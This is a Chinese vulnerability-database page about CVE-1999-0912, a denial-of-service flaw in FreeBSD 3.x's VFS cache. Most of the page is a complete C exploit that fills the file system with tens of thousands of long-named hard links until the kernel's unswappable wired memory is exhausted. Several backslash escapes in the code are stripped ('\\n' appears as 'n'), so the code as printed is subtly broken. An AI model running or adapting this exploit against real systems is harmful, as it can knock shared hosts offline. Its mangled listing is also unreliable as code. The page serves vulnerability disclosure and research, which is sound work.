FreeBSD vfs_cache拒绝服务漏洞

49次阅读
没有评论

FreeBSD vfs_cache拒绝服务漏洞

漏洞ID 1105546 漏洞类型 未知
发布时间 1999-09-22 更新时间 2005-05-02
FreeBSD vfs_cache拒绝服务漏洞CVE编号 CVE-1999-0912
FreeBSD vfs_cache拒绝服务漏洞CNNVD-ID CNNVD-199909-040
漏洞平台 FreeBSD CVSS评分 2.1
|漏洞来源
https://www.exploit-db.com/exploits/19505
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199909-040
|漏洞详情
FreeBSDVFScache(vfs_cache)中存在漏洞。本地用户通过打开大量的文件导致拒绝服务。
|漏洞EXP
source: http://www.securityfocus.com/bid/653/info

A vulnerability exists in FreeBSD's new VFS cache introduced in version 3.0 that allows a local and possibly remote user to force the kernel to consume large quantities of wired memory thus creating a denial of service condition. The new VFS cache has no way to purge entries from memory while the file is open, consuming wired memory and allowing for the denial of service (memory that cannot be swapped out).

FreeBSD versions earlier than 3.0 are not vulnerable, nor is the original 4.4BSD-Lite code. 

#include <stdio.h>
#include <unistd.h>
#include <sys/stat.h>

#define	NFILE	64
#define	NLINK	30000
#define	NCHAR	245

int
main()
{
	char junk[NCHAR+1],
	     dir[2+1+2+1], file1[2+1+2+1+NCHAR+3+1], file2[2+1+2+1+NCHAR+3+1];
	int i, j;
	struct stat sb;

	memset(junk, 'x', NCHAR);
	junk[NCHAR] = '';
	for (i = 0; i < NFILE; i++) {
		printf("r%02d/%05d...", i, 0),
		fflush(stdout);
		sprintf(dir, "%02d-%02d", i, 0);
		if (mkdir(dir, 0755) < 0)
			fprintf(stderr, "mkdir(%s) failedn", dir),
			exit(1);
		sprintf(file1, "%s/%s%03d", dir, junk, 0);
		if (creat(file1, 0644) < 0)
			fprintf(stderr, "creat(%s) failedn", file1),
			exit(1);
		if (stat(file1, &sb) < 0)
			fprintf(stderr, "stat(%s) failedn", file1),
			exit(1);
		for (j = 1; j < NLINK; j++) {
			if ((j % 1000) == 0) {
				printf("r%02d/%05d...", i, j),
				fflush(stdout);
				sprintf(dir, "%02d-%02d", i, j/1000);
				if (mkdir(dir, 0755) < 0)
					fprintf(stderr, "mkdir(%s) failedn", dir),
					exit(1);
			}
			sprintf(file2, "%s/%s%03d", dir, junk, j%1000);
			if (link(file1, file2) < 0)
				fprintf(stderr, "link(%s,%s) failedn", file1, file2),
				exit(1);
			if (stat(file2, &sb) < 0)
				fprintf(stderr, "stat(%s) failedn", file2),
				exit(1);
		}
	}
	printf("rfinished successfullyn");
}
|参考资料

来源:BID
名称:653
链接:http://www.securityfocus.com/bid/653
来源:OSVDB
名称:1079
链接:http://www.osvdb.org/1079

相关推荐: PHPMyAdmin Multiple Local File Include Vulnerabilities

PHPMyAdmin Multiple Local File Include Vulnerabilities 漏洞ID 1097060 漏洞类型 Input Validation Error 发布时间 2005-02-24 更新时间 2005-02-24 CV…

正文完
 0